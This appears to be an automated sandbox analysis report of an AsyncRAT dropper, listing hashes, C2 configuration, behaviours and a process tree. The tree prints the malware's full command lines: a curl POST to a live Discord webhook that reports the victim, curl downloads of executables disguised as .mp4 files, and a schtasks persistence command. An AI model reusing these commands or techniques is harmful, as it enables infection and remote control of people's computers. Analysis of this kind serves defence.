Analysis
  max time kernel: 149s
  max time network: 150s
  platform: windows10-2004_x64
  resource: win10v2004-20240611-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20240611-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 22-06-2024 08:39
  Static task: static1
  Behavioral task: behavioral1
  Sample: Dropper.exe
  Resource: win7-20240508-en
General
  Target: Dropper.exe
  Size: 88KB
  MD5: 82f78463f2a3b53111a06367e6f9bfd7
  SHA1: ef55bb9f0648e2f0e4444c54db5fdc4ba002ad9f
  SHA256: 3aed680e7ffde9f2f34681d7d60ee188862da9d48c7cace56060eebd6bbfb152
  SHA512: b781362092c869cd0b8fd5f92c8e2ece37e65a8b864e7127d5a8837ab06d1a08decc795bc7a4bfa58f362af5db26d1287f289155d7408a47b9ecf054419583c0
  SSDEEP: 1536:hi8ujM8Nvd5hPSXvD1n70U4Ox+d9xHhGYL15b6tclMDgR:E84MMxSXpnJ6xfb6tYR
Malware Config
  Extracted family: asyncrat
  Config name: Default
  C2 host: environmental-blank.gl.at.ply.gg:25944
  delay: 1
  install: true
  install_file: $77-aachost.exe
  install_folder: %AppData%
Signatures

Async RAT payload (1 IoC)
  resource                                            yara_rule
  C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe   family_asyncrat

Downloads MZ/PE file

Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  description         ioc                                                                                                process
  Key value queried   \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation   Dropper.exe
  Key value queried   \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation   $77-aachost.exe

Executes dropped EXE (3 IoCs)
  pid    process
  4184   $77-aachost.exe
  4404   $77-sdchost.exe
  4980   $77-penisballs.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Delays execution with timeout.exe (1 IoC)
  pid    process
  2436   timeout.exe

Scheduled Task/Job: Scheduled Task (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.

Suspicious behavior: EnumeratesProcesses (21 IoCs)
  pid    process              events
  4184   $77-aachost.exe      19
  4980   $77-penisballs.exe   2

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description               pid    process
  Token: SeDebugPrivilege   4404   $77-sdchost.exe
  Token: SeDebugPrivilege   4980   $77-penisballs.exe
  Token: SeDebugPrivilege   4184   $77-aachost.exe

Suspicious use of SetWindowsHookEx (1 IoC)
  pid    process
  4980   $77-penisballs.exe

Suspicious use of WriteProcessMemory (44 IoCs)
  Distinct writer -> target process pairs, with the number of logged write events for each:
  pid    process              target pid   target process       events
  2080   Dropper.exe          4848         cmd.exe              3
  4848   cmd.exe              4792         curl.exe             3
  2080   Dropper.exe          4564         cmd.exe              3
  4564   cmd.exe              1188         curl.exe             3
  2080   Dropper.exe          4184         $77-aachost.exe      2
  2080   Dropper.exe          4912         cmd.exe              3
  4912   cmd.exe              4276         curl.exe             3
  2080   Dropper.exe          4404         $77-sdchost.exe      2
  2080   Dropper.exe          4068         cmd.exe              3
  4068   cmd.exe              1864         curl.exe             3
  2080   Dropper.exe          4980         $77-penisballs.exe   2
  2080   Dropper.exe          5032         cmd.exe              3
  5032   cmd.exe              1868         curl.exe             3
  4184   $77-aachost.exe      544          cmd.exe              2
  4184   $77-aachost.exe      3248         cmd.exe              2
  3248   cmd.exe              2436         timeout.exe          2
  544    cmd.exe              2548         schtasks.exe         2

Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
  (indentation shows the process tree; each entry gives image path, command line, and the signatures that fired for it)

  C:\Users\Admin\AppData\Local\Temp\Dropper.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Dropper.exe"
    Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253986586673283103/CvnAbLIiYSc2d4NdsSOOo_z4TsnJT2JyuZLeKUKi_ejCvAa0imwn4KDGeajcvxpgCrSn" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
      Signatures: Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\curl.exe
        Command line: curl "https://discord.com/api/webhooks/1253986586673283103/CvnAbLIiYSc2d4NdsSOOo_z4TsnJT2JyuZLeKUKi_ejCvAa0imwn4KDGeajcvxpgCrSn" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"

    C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/aachost.mp4?v=1719043456713 --output C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
      Signatures: Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\curl.exe
        Command line: curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/aachost.mp4?v=1719043456713 --output C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe

    C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
      Signatures: Checks computer location settings; Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

      C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"' & exit
        Signatures: Suspicious use of WriteProcessMemory

        C:\Windows\system32\schtasks.exe
          Command line: schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'
          Signatures: Scheduled Task/Job: Scheduled Task

      C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp815B.tmp.bat""
        Signatures: Suspicious use of WriteProcessMemory

        C:\Windows\system32\timeout.exe
          Command line: timeout 3
          Signatures: Delays execution with timeout.exe

    C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/sachost.mp4?v=1719043085712 --output C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
      Signatures: Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\curl.exe
        Command line: curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/sachost.mp4?v=1719043085712 --output C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe

    C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
      Signatures: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/%2477-penisware2.mp4?v=1719043121460 --output C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
      Signatures: Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\curl.exe
        Command line: curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/%2477-penisware2.mp4?v=1719043121460 --output C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe

    C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
      Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx

    C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/Install.mp4?v=1719043283499 --output C:\Users\Admin\AppData\Local\Temp\$77-install.exe
      Signatures: Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\curl.exe
        Command line: curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/Install.mp4?v=1719043283499 --output C:\Users\Admin\AppData\Local\Temp\$77-install.exe

  C:\Windows\System32\rundll32.exe
    Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Downloads

  C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
    Filesize: 66KB
    MD5: 514d0abd73e992c2a1622795b33f17f4
    SHA1: 96740e82d7a119d808000783507bd92690584fe6
    SHA256: b333ecc39a213f6ce650dd4af50d2d201ee6f80dea63ec98132220670469bf53
    SHA512: 4600baecf44a9cbc7b33fd02d1807628597c6ecc87aeb12b653f6e3a46c951fe9cd789e100d96df8c57b5d0446397c8a639f0c7ee8ef9395c172598ce8185bc8

  C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
    Filesize: 256KB
    MD5: 18f497deffe88b6b2cff336a277aface
    SHA1: 4e1413241d3d3e4dbff399d179f8fd64f3ecd39e
    SHA256: 8133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5
    SHA512: 35c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d

  C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
    Filesize: 299KB
    MD5: 12d2d1f43b0ecf5a949adde54b1ffb65
    SHA1: ad0529bc9102210f3616c7b626c37d6454d44033
    SHA256: 619b345f6803d45bcf20305efb3407a8ae26ba0aaffe38e7b5f31cb8c26101ef
    SHA512: 0a55fc91d0bc7e3123b16b012c70c15f731c3be1f8499c733cc994fcec43d8cdf6279e0b9eedda35035423c8891e076be374c512d6506d81e1f81802af25153f

  C:\Users\Admin\AppData\Local\Temp\tmp815B.tmp.bat
    Filesize: 155B
    MD5: d18965182157fee8347183c7ad862427
    SHA1: f1d53d7eb51b900d8a64a88dce9f97bb69702773
    SHA256: 95798dc64ea9d985f441773f68767f03151c8eff61a908a0e709298a9561ac35
    SHA512: 7e749a2c20850cd7264f76880b3d34a2c74e4bd85e4a3cc4d290ad1f25e5005960d097e6dc00c9b4eff10192ad052241641f2a191b60226b9deca31f3097525b

  Memory dumps
    memory/2080-0-0x000000007480E000-0x000000007480F000-memory.dmp   Filesize: 4KB
    memory/2080-1-0x0000000000C30000-0x0000000000C4C000-memory.dmp   Filesize: 112KB
    memory/2080-2-0x000000007480E000-0x000000007480F000-memory.dmp   Filesize: 4KB
    memory/4184-6-0x00000000000C0000-0x00000000000D6000-memory.dmp   Filesize: 88KB
    memory/4404-10-0x0000000000B50000-0x0000000000BA2000-memory.dmp  Filesize: 328KB
    memory/4980-14-0x00000000006C0000-0x0000000000706000-memory.dmp  Filesize: 280KB
    memory/4980-15-0x0000000002760000-0x0000000002766000-memory.dmp  Filesize: 24KB